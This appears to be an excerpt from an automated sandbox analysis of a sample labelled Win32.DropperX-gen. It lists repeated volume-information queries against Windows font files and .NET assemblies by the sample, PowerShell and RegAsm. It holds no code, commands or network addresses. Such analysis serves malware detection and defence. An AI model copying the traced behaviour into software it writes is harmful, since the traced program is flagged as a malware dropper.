                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
